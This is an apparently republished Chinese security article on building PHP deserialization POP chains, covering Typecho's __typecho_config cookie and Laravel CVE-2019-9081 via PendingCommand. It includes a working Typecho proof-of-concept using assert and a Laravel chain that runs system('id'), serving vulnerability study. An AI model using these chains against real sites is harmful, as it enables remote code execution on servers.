由浅入深剖析序列化攻击(三)
2019-08-02 11:48:23 Author: www.4hou.com(查看原文) 阅读量:125 收藏

前言

接之前的两篇文章:

https://www.4hou.com/web/17835.html

https://www.4hou.com/web/17976.html

之前分别介绍了php序列化攻击的魔法方法、session序列化引擎以及原生类序列化问题。

本篇文章则主要从真实案例来看序列化的pop链构造。

typecho序列化

这一节就简单说一下构造链,因为之前的文章分析过,可详见:

https://skysec.top/2017/12/29/cms%E5%B0%8F%E7%99%BD%E5%AE%A1%E8%AE%A1-typecho%E5%8F%8D%E5%BA%8F%E5%88%97%E6%BC%8F%E6%B4%9E/

总结

1.找到入手点__typecho_config:

$config = unserialize(base64_decode(Typecho_Cookie::get('__typecho_config')));

2.寻找可用类Typecho_Db:

$db = new Typecho_Db($config['adapter'], $config['prefix']);

3.利用Typecho_Feed魔法方法__toString():

$config['adapter'] => new Typecho_Feed()
class Typecho_Feed __toString()

4.利用Typecho_Request魔法方法__get():

$item['author']->screenName
class Typecho_Request  __get()

5.利用get()方法,完成利用链:

get() -> _applyFilter() -> call_user_func

poc

class Typecho_Feed{
    private $_type='ATOM 1.0';
    private $_items;
 
    public function __construct(){
        $this->_items = array(
            '0'=>array(
                'author'=> new Typecho_Request())
        );
    }
}
 
class Typecho_Request{
    private $_params = array('screenName'=>'phpinfo()');
    private $_filter = array('assert');
}
$poc = array(
'adapter'=>new Typecho_Feed(),
'prefix'=>'typecho');
 
echo base64_encode(serialize($poc));

laravel序列化

Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework),若其本身出现漏洞,则对使用响应框架开发的网站影响是致命的。而这里就将分析laravel框架序列化RCE,CVE编号:CVE-2019-9081,受影响范围:laravel >= 5.7。

类名加载

我们首先随便构造一段序列化:

<?php
class sky{
public $sky='test';
}
$sky = new sky();
echo urlencode(serialize($sky));
# O%3A3%3A%22sky%22%3A1%3A%7Bs%3A3%3A%22sky%22%3Bs%3A4%3A%22test%22%3B%7D

我们传入laravel,并进行反序列化,可以看到load方法试图加载我们随便输入的sky类,首先在$facadeNamespace中寻找指定类名:

2019-07-18-16-14-05.png

2019-07-18-16-14-16.png

如果找到,则会通过loadFacade进行加载,否则则进入loadClass进行class map查找,在vendor目录下寻找所需类:

2019-07-18-16-04-45.png

2019-07-18-16-18-25.png

但是并不能找到sky类,最后会return false。

最后查看是否class名以Swift_开头:

2019-07-18-16-06-04.png

最后因为找不到对应类的定义,所以并不能成功进入反序列化流程。

但如果我们用一个存在的类,可以明显发现在findFile函数的classMap中找到了相关类,并返回进行了include:

2019-07-18-16-35-36.png

2019-07-18-16-36-22.png

危险类挖掘

挖掘一个框架的新漏洞,从框架新加入的代码入手是一个很好的思路。我们注意到laravel在5.7之后加入了PendingCommand:

2019-07-18-16-44-20.png

值得注意的是,我们查到该文件,其定义了PendingCommand类,同时注意到其两个方法:

/**
     * Execute the command.
     *
     * @return int
     */
public function execute()
{
    return $this->run();
}
    /**
     * Handle the object's destruction.
     *
     * @return void
     */
public function __destruct()
{
    if ($this->hasExecuted) {
        return;
    }
    $this->run();
}

非常有意思的是,该类有魔法方法__destruct,而该魔法方法会调用run函数,而run函数可以进行执行命令。

我们查看其构造方式:

public function __construct($command, $parameters,$class,$app)
    {
        $this->command = $command;
        $this->parameters = $parameters;
        $this->test=$class;
        $this->app=$app;
    }

一共需要用到4个属性,我们查阅对应手册:

2019-07-18-19-03-19.png

run & mockConsoleOutput

我们跟进run方法:

public function run()
    {
        $this->hasExecuted = true;
        $this->mockConsoleOutput();
        try {
            $exitCode = $this->app[Kernel::class]->call($this->command, $this->parameters);
        } catch (NoMatchingExpectationException $e) {
            if ($e->getMethodName() === 'askQuestion') {
                $this->test->fail('Unexpected question "'.$e->getActualArguments()[0]->getQuestion().'" was asked.');
            }
            throw $e;
        }
        if ($this->expectedExitCode !== null) {
            $this->test->assertEquals(
                $this->expectedExitCode, $exitCode,
                "Expected status code {$this->expectedExitCode} but received {$exitCode}."
            );
        }
        return $exitCode;
    }

关注到第一个关键点:

$this->mockConsoleOutput();

我们跟进该函数:

protected function mockConsoleOutput()
    {
        $mock = Mockery::mock(OutputStyle::class.'[askQuestion]', [
            (new ArrayInput($this->parameters)), $this->createABufferedOutputMock(),
        ]);
        foreach ($this->test->expectedQuestions as $i => $question) {
            $mock->shouldReceive('askQuestion')
                ->once()
                ->ordered()
                ->with(Mockery::on(function ($argument) use ($question) {
                    return $argument->getQuestion() == $question[0];
                }))
                ->andReturnUsing(function () use ($question, $i) {
                    unset($this->test->expectedQuestions[$i]);
                    return $question[1];
                });
        }
        $this->app->bind(OutputStyle::class, function () use ($mock) {
            return $mock;
        });
    }

首先是第一步:

$mock = Mockery::mock(OutputStyle::class.'[askQuestion]', [
            (new ArrayInput($this->parameters)), $this->createABufferedOutputMock(),
        ]);

我们跟进createABufferedOutputMock:

private function createABufferedOutputMock()
    {
        $mock = Mockery::mock(BufferedOutput::class.'[doWrite]')
                ->shouldAllowMockingProtectedMethods()
                ->shouldIgnoreMissing();
        foreach ($this->test->expectedOutput as $i => $output) {
            $mock->shouldReceive('doWrite')
                ->once()
                ->ordered()
                ->with($output, Mockery::any())
                ->andReturnUsing(function () use ($i) {
                    unset($this->test->expectedOutput[$i]);
                });
        }
        return $mock;
    }

这里如果想继续走下去,我们需要属性$this->test->expectedOutput:

2019-07-18-17-12-55.png

那么有没有类有expectedOutput呢?我们全局搜索,发现在Illuminate\Foundation\Testing\Concerns中存在这样的属性。

但这样的类很难被实例化,无法走通后面的路。但此时我们可以巧用魔法方法__get:当我们试图获取一个不可达属性,类会自动调用__get函数。

我们找到如下类:

vendor/laravel/framework/src/Illuminate/Auth/GenericUser.php

2019-07-18-17-13-51.png

可以使用我们经常使用的小trick,设置键名为expectedOutput的数组,即可利用。

然后是第二步:

foreach ($this->test->expectedQuestions as $i => $question)

此处依旧可以使用__get方法,定义键名为expectedQuestions的数组即可。

run & 实例化对象

到此为止,我们已经能构造出PendingCommand前3个参数的值了:

$test = new Illuminate\Auth\GenericUser(
    array(
        "expectedOutput"=>array("0"=>"1"),
                "expectedQuestions"=>array("0"=>"1")
         )
);
$command = "system";
$parameters = array('id');

那么最后一个参数$app同样尤为关键,我们继续跟进run的代码,来到关键第三步:

$exitCode = $this->app[Kernel::class]->call($this->command, $this->parameters);

我们跟入这一句,可以发现,首先代码在实例化对象:

$this->app[Kernel::class]

然后再去调对应的call方法,那么跟入不难发现,其想要实例化的对象是:

Illuminate\Contracts\Console\Kernel

首先进入:

2019-07-18-19-16-16.png

跟进make:

public function make($abstract, array $parameters = [])
    {
        $abstract = $this->getAlias($abstract);
        if (isset($this->deferredServices[$abstract]) && ! isset($this->instances[$abstract])) {
            $this->loadDeferredProvider($abstract);
        }
        return parent::make($abstract, $parameters);
    }

再跟进其父类的make:

public function make($abstract, array $parameters = [])
    {
        return $this->resolve($abstract, $parameters);
    }

跟进resolve:

...
$concrete = $this->getConcrete($abstract);
...

那么此时发现$concrete的值来自于getConcrete($abstract):

vendor/laravel/framework/src/Illuminate/Container/Container.php

$concrete = $this->getConcrete($abstract);

跟进getConcrete:

protected function getConcrete($abstract)
    {
        if (! is_null($concrete = $this->getContextualConcrete($abstract))) {
            return $concrete;
        }
        // If we don't have a registered resolver or concrete for the type, we'll just
        // assume each type is a concrete name and will attempt to resolve it as is
        // since the container should be able to resolve concretes automatically.
        if (isset($this->bindings[$abstract])) {
            return $this->bindings[$abstract]['concrete'];
        }
        return $abstract;
    }

我们注意到,如果bindings[$abstract]存在,则会返回bindings[$abstract]['concrete']。

而bindings是类Container的属性,同时注意到类Container中也有可以RCE的call方法。那么现在思路很清晰:我们可以任意实例化类Container的子类,这样在其子类调用call的时候,会触发类Container的call方法,那么即可达成RCE。

而这样的类选择类Container的子类:Illuminate\Foundation\Application再好不过。

而$abstract的值为Illuminate\Contracts\Console\Kernel。

那么此时我们容易知道$bindings只要存在键名为Illuminate\Contracts\Console\Kernel的数组,就能进入该if条件句,那么我们只要按如下进行构造:

array(
    "Illuminate\Contracts\Console\Kernel"=>array("concrete"=>"Illuminate\Foundation\Application")
)

就可以保证返回值为Illuminate\Foundation\Application。

接下来会判断是否可以build:

if ($this->isBuildable($concrete, $abstract)) {
            $object = $this->build($concrete);
        } else {
            $object = $this->make($concrete);
        }

我们跟进isBuildable:

protected function isBuildable($concrete, $abstract)
    {
        return $concrete === $abstract || $concrete instanceof Closure;
    }

如果$concrete和$abstract相等则可以build。

但我们现在明显:

$concrete = 'Illuminate\Foundation\Application';
$abstract = 'Illuminate\Contracts\Console\Kernel';

所以会进入else分支,继续make。

而make时,我们注意到:

2019-07-18-22-35-43.png

而else分支传入make的值为:

$object = $this->make($concrete);

这样一来直接就构成了后面:

$concrete = $this->getConcrete($abstract);

这次bindings数组里并没有键名为Illuminate\Foundation\Application的数组里,于是直接回返回$abstract的值,这样一来就达到了实例化Illuminate\Foundation\Application的目的:

$concrete = $abstract = 'Illuminate\Foundation\Application'

2019-07-18-21-54-57.png

最后则可以让最后的$this->app[Kernel::class]的值变为Illuminate\Foundation\Application。为了更加直观,我们在这个位置做如下改写:

2019-07-18-21-58-57.png

2019-07-18-22-00-19.png

紧接着会调用Illuminate\Foundation\Application父类Illuminate\Container\Container的call方法:

vendor/laravel/framework/src/Illuminate/Container/Container.php

2019-07-18-18-33-58.png

2019-07-18-22-03-01.png

最后走入这个call_user_func_array,而$callback是我们可以控制的system,而getMethodDependencies(),我们跟进:

2019-07-18-22-04-15.png

最后会返回我们需要的参数id,那么这样一来,即可RCE成功:

2019-07-18-22-04-56.png

总结

laravel整个反序列化RCE链用的非常漂亮:

1.类PendingCommand 利用 __destruct触发run()方法

2.类vendor/laravel/framework/src/Illuminate/Auth/GenericUser.php 构造数组

3.类vendor/laravel/framework/src/Illuminate/Auth/GenericUser.php 利用 __get()魔法方法满足mockConsoleOutput

4.利用任意实例化对象,实例化Illuminate\Foundation\Application

5.调用call触发父类call方法RCE

后记

真实的chain构造远比之前例题中的难上多倍,但整个过程非常有趣,可以学到不少姿势~


文章来源: https://www.4hou.com/web/19312.html
如有侵权请联系:admin#unsafe.sh